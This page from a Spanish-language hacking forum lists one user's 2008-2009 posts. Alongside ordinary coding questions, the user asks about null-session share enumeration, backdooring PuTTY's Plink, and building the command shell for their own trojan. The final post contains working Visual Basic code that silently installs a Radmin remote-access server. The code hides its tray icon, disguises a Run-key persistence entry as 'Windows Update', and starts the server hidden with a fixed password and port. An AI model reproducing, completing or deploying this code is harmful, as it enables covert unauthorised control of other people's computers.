elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Temas
Páginas: 1 [2] 3 4
11  Programación / Programación Visual Basic / Listar los recursos compartidos de un equipo remoto!! en: 18 Enero 2009, 22:32 pm
Como puedo establecieno una session nula enumerar los recursos compartidos del mismo....

Slu2
12  Programación / Programación Visual Basic / Una pregunta sobre Crypto API Microsoft Base Cryptographic Provider v1.0!! en: 13 Enero 2009, 19:17 pm
Holas gente una simple preguntica...

El Crypto que esta en el ApiGuide es el mismo que Crypto API Microsoft Base Cryptographic Provider v1.0...
13  Programación / .NET (C#, VB.NET, ASP) / Como puedo debuguear un projecto que es una consola msdos!! en: 29 Diciembre 2008, 23:30 pm
Lo que quiero ver es como le llegan los datos, y lo que va haciendo con ellos, pero es que es en consola msdos y no se como debuguearlo para ver lo que va haciendo con los parametros... thx ahh y esta en C
14  Programación / Programación Visual Basic / Api Guide Encrypt/Decrypt problemas!! en: 25 Diciembre 2008, 22:14 pm
Alguien me puede enseñar a usar el codigo de encrypt y decrypt que viene en la Api Guide...

Salu2
15  Programación / .NET (C#, VB.NET, ASP) / Una dudita!! en: 24 Diciembre 2008, 01:47 am
Veran estoy trasteando el codigo del open source "Putty" mas exactamente el del "Plink", y todo muy bien, modifique varias cosas y lo compile de nuevo y funciona de maravillas, lo que sucede es que quiero agregarle un codigo para anclarlo en la Pc que me de la gana a mi, entonces ya el codigo lo tengo el problemilla es que el lenguaje que mas domino yo es el Visual Basic como tal y ese proyecto estan en C, pero creo que lei por algun lugar que con el .Net puedo llevar el codigo de Visual Basic a C, igual si puedo de alguna manera agregarle algun codigo en C para alcanzar mi meta y alguien me puede ayudar se lo agradecere.

Gracias
16  Programación / Programación Visual Basic / Organizando y Agrupando!! en: 20 Diciembre 2008, 19:02 pm
Hola people necesito que me ayuden con algo rapido, toy buscando un algoritmo para minimizar el codigo, esta es la situacion..

tengo esto..

a=1,2,3,5,8,10,11,12

lo que necesito es que el codigo me agrupe eso de esta manera..

b=1-3,5,8,10-12

grx de antemano cualquier ayuda....
17  Programación / Programación Visual Basic / Diseñando Consola Msdos para mi Troyano!! en: 21 Noviembre 2008, 03:40 am
Ola people ya voy a terminar el bicho y se me antojo hacer la tipica shell como tienen muchos troyanos, como Bifrost, Poison, etc..

Lo que me sucede es que por ejemplo si quiero ejecutar un "dir" con el comando q usan por ahi...

cmd /c dir>c:\registro.txt

esto no funka bien porque ejecuta el dir en el directorio donde esta el troyano, entonces modifique mi soft para que pusiera el directorio en donde estaba el usuario trabajando digamos que estuviese en c:\windows\pepito entonces quedaba asi

dir c:\windows\pepe

y funka pero si lo usas con otro comando como por ejemplo

copy *.txt c:\windows\system32

ya eso da problemas, espero que entiendan lo que me sucede, en resumen que el comando ese esta limitado, haber si alguien me echa una manita...

Salu2 y grx
18  Programación / Programación Visual Basic / Problema diseñando un proxy!! en: 16 Noviembre 2008, 23:45 pm
Hola gente, tengo esta situacion, estoy programando un proxy que pida autentificacion y donde se traba el paragua es en que cuando le mando el mensaje al cliente "407" pidiendole que me ponga user con pass, el cliente tipea y cuando acepta a mi programa nunca le llega la respuesta del cliente, que me puede estar pasando...
yo debugue y a mi programa la unica ves que le llega datos del browser es cuando solicita la web por primera vez, despues que le envio el "407", que me responde ahi se queda el browser tratando como de enviar algo y nunca llega, instale el Ccproxy y funciona de maravillas asi que es algo que estoy pasando por alto supongo, de echo el mensaje "407" que le envio al cliente, es el que usa el mismo Ccproxy y funciona genial solo que no me llega la respuesta del cliente..soluciones...

Thx
19  Programación / Programación Visual Basic / Configurar mi programa como un servicio de windows? en: 17 Septiembre 2008, 04:08 am
Pues eso como logro poner mi soft como un servicio..

GRax...
20  Programación / Programación Visual Basic / Agregar al registro tipo Binary? en: 1 Agosto 2008, 19:07 pm
Hola people veran lo mio es sencillo lo que necesito es agregar tres valores en el Registro de tipo Binary como veran en el codigo de abajo, estoy anadiendo:
01 00 00 00
pero tambien necesito agregar estos otros 2..
4c 78 c7 ed d9 e4 16 e9 45 1b e9 7c bb 7c 2e cb
y
b4 11 00 00
como hago para agregarlos

Gracias...


Const REG_SZ = 1    ' Unicode nul terminated string
Const REG_BINARY = 3    ' Free form binary
Const HKEY_LOCAL_MACHINE = &H80000002
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Sub SaveStringLong(hKey As Long, strPath As String, strValue As String, strData As String, dif As String)
    Dim Ret
    '   Create a new key
    RegCreateKey hKey, strPath, Ret
    '   Set the key's value
    If dif = 1 Then
        RegSetValueEx Ret, strValue, 0, REG_BINARY, CLng(strData), 4
    ElseIf dif = 2 Then
        RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData)
    End If
    '   Close the key
    RegCloseKey Ret
End Sub

Private Sub Form_Load()
    'KPD-Team 1998
    'URL: http://www.allapi.net/
    'E-Mail: KPDTeam@Allapi.net
    Dim strString As String
    'Ask for a value
    'Save the value to the registry
    SaveStringLong HKEY_LOCAL_MACHINE, "System\RAdmin\v2.0\Server\Parameters", "DisableTrayIcon", "01", "1" ' Agrego 01 00 00 00
    SaveStringLong HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", "Windows Update", "C:\Windows\System32\wupd.exe", "2"
    Shell "apisystem.exe /pass:zxczxc /port:4532", vbHide
    End
End Sub
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines